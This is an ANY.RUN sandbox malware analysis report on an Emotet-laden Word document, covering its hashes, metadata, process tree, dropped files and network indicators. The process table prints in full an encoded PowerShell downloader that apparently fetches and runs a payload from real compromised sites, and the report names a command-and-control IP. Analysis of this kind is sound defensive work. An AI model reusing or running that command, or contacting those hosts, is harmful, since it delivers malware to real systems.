Malware analysis report89.doc Malicious activity | ANY.RUN

Add for printing

File name:	report89.doc
Full analysis:	https://app.any.run/tasks/707df74d-5885-485b-b1e5-7dd53fc10272
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	September 18, 2019, 18:50:50
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open generated-doc emotet-doc emotet trojan
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Soft, Subject: Rustic Frozen Chips, Author: Bertrand Dietrich, Comments: Mountains connecting, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:	9F8362E700BC566C6975C2AC17615AEE
SHA1:	8A0F60361AF8287A8B8BC8CB37EDAB6DAE590A17
SHA256:	E1BCE4D42B83A244AF8CD06F990A20606602EA6CB6CC4CA5EEE5E89ABC601343
SSDEEP:	6144:TYyxNRIIt1POT3XtwNJ6mdVPLkIZ7NSU4jJntATfD9GPy4XSK2:TYyxNRIIt1POT3XtwNJ6mdFXZ7NSU4V+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 180 seconds
Heavy Evasion option:: on
Network geolocation:: off
Additional time used:: 120 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Application was dropped or rewritten from another process
  - 835.exe (PID: 2856)
  - 835.exe (PID: 3496)
  - 835.exe (PID: 2952)
  - 835.exe (PID: 3652)
  - easywindow.exe (PID: 776)
  - easywindow.exe (PID: 2220)
  - easywindow.exe (PID: 2684)
  - easywindow.exe (PID: 3664)
- Emotet process was detected
  - 835.exe (PID: 3652)
- Changes the autorun value in the registry
  - easywindow.exe (PID: 2220)
- EMOTET was detected
  - easywindow.exe (PID: 2220)
- Connects to CnC server
  - easywindow.exe (PID: 2220)
SUSPICIOUS
- Executed via WMI
  - powershell.exe (PID: 3804)
- PowerShell script executed
  - powershell.exe (PID: 3804)
- Creates files in the user directory
  - powershell.exe (PID: 3804)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 3804)
  - 835.exe (PID: 3652)
- Starts itself from another location
  - 835.exe (PID: 3652)
INFO
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3552)
- Creates files in the user directory
  - WINWORD.EXE (PID: 3552)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title:	Soft
Subject:	Rustic Frozen Chips
Author:	Bertrand Dietrich
Keywords:	-
Comments:	Mountains connecting
Template:	Normal.dotm
LastModifiedBy:	-
RevisionNumber:	1
Software:	Microsoft Office Word
TotalEditTime:	-
CreateDate:	2019:09:18 14:38:00
ModifyDate:	2019:09:18 14:38:00
Pages:	1
Words:	95
Characters:	547
Security:	None
CodePage:	Windows Latin 1 (Western European)
Company:	Barrows, Koss and Marquardt
Lines:	4
Paragraphs:	1
CharCountWithSpaces:	641
AppVersion:	16
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	-
HeadingPairs:	Title 1
Manager:	Medhurst
CompObjUserTypeLen:	32
CompObjUserType:	Microsoft Word 97-2003 Document

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3552	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\report89.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3804	powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3496	"C:\Users\admin\835.exe"	C:\Users\admin\835.exe	—	powershell.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2856	"C:\Users\admin\835.exe"	C:\Users\admin\835.exe	—	835.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2952	--f0e46278	C:\Users\admin\835.exe	—	835.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3652	--f0e46278	C:\Users\admin\835.exe		835.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2684	"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	835.exe
User: admin Integrity Level: MEDIUM Exit code: 0
776	"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	easywindow.exe
User: admin Integrity Level: MEDIUM Exit code: 0
3664	--fd47f3b8	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	easywindow.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2220	--fd47f3b8	C:\Users\admin\AppData\Local\easywindow\easywindow.exe		easywindow.exe
User: admin Integrity Level: MEDIUM

Add for printing

Total events

3 037

Read events

2 538

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR9BA8.tmp.cvr		—
		MD5:—	SHA256:—
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\63866645.wmf		wmf
		MD5:8DBEEDF150AA98380CE396741C03C54A	SHA256:770B512F7419E166B4F48D608800B627FB4656DC10786B1D6E1B6CDC2BF29F5F
3552	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:58B9E26476EFDCA12C24853A9AC7DC39	SHA256:C2A5BD3D96F8918D977F145D7E597E1200D6CCE41358165AC8A1BCC254140EFD
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\49B4D83D.wmf		wmf
		MD5:C78BB32A2CD862C59166AAD1ED1D756B	SHA256:B615E90856B1FECA005AD302F09F3226812680F2BA13F8C9702441F312AAC6D2
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\974FAF82.wmf		wmf
		MD5:8E6DEF5B61985AAA923C8E4E256082EC	SHA256:D54FC5860A92CD9FEDF3A1A3A83876C60EF282C3729C5625FC97BDEAA52452EC
3552	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\report89.doc.LNK		lnk
		MD5:AC38D549E03A859AEE64024C6DD3FCC0	SHA256:CC11F096FB387DB576F0B45F5348CE08216C2C8DC5D8C8144577817571F720C1
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd		tlb
		MD5:715AE828EB348B4A04C7625723D1FEC3	SHA256:4100E28CDF31F9C17F0EEE0240468B4E55937C77737EC2CADC56D89287361A6C
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E8A1253.wmf		wmf
		MD5:8A56D61FC3D4CADF60F253A11D23D4B9	SHA256:CD5BB41E1D7B4530D2093FB43A196F1E6B09F2A116940A23AB7E32F8E7B454EF
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFD52D9.wmf		wmf
		MD5:FE3A9389DCD40C80DE2EEAB3F3C5E6FC	SHA256:EE088F19C49F4AD0F175242ED5251A2181D267E5AF9A164433D77E717300EE0F
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD141254.wmf		wmf
		MD5:4F9623B6E4D73C98B6EE1D305B894DF0	SHA256:E01D16C354DA14EF703AC03757CA38E974A5AA6A89D36D8F4FD9A03C2D05FFF5

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2220	easywindow.exe	POST	200	114.79.134.129:443	http://114.79.134.129:443/srvc/usbccid/nsip/merge/	IN	binary	132 b	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3804	powershell.exe	104.27.132.144:443	mnpasalubong.com	Cloudflare Inc	US	shared
3804	powershell.exe	124.158.6.218:80	thinhvuongmedia.com	CMC Telecommunications Services Company	VN	suspicious
2220	easywindow.exe	114.79.134.129:443	—	D-Vois Broadband Pvt Ltd	IN	malicious

DNS requests

Domain	IP	Reputation
thinhvuongmedia.com	124.158.6.218	suspicious
dns.msftncsi.com	131.107.255.255	shared
mnpasalubong.com	104.27.132.144 104.27.133.144	unknown

Threats

PID	Process	Class	Message
2220	easywindow.exe	A Network Trojan was detected	AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2220	easywindow.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo/Emotet
2220	easywindow.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)

2 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

report89.doc

9F8362E700BC566C6975C2AC17615AEE

8A0F60361AF8287A8B8BC8CB37EDAB6DAE590A17

E1BCE4D42B83A244AF8CD06F990A20606602EA6CB6CC4CA5EEE5E89ABC601343

6144:TYyxNRIIt1POT3XtwNJ6mdVPLkIZ7NSU4jJntATfD9GPy4XSK2:TYyxNRIIt1POT3XtwNJ6mdFXZ7NSU4V+

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Emotet process was detected

Changes the autorun value in the registry

EMOTET was detected

Connects to CnC server

SUSPICIOUS

Executed via WMI

PowerShell script executed

Creates files in the user directory

Executable content was dropped or overwritten

Starts itself from another location

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings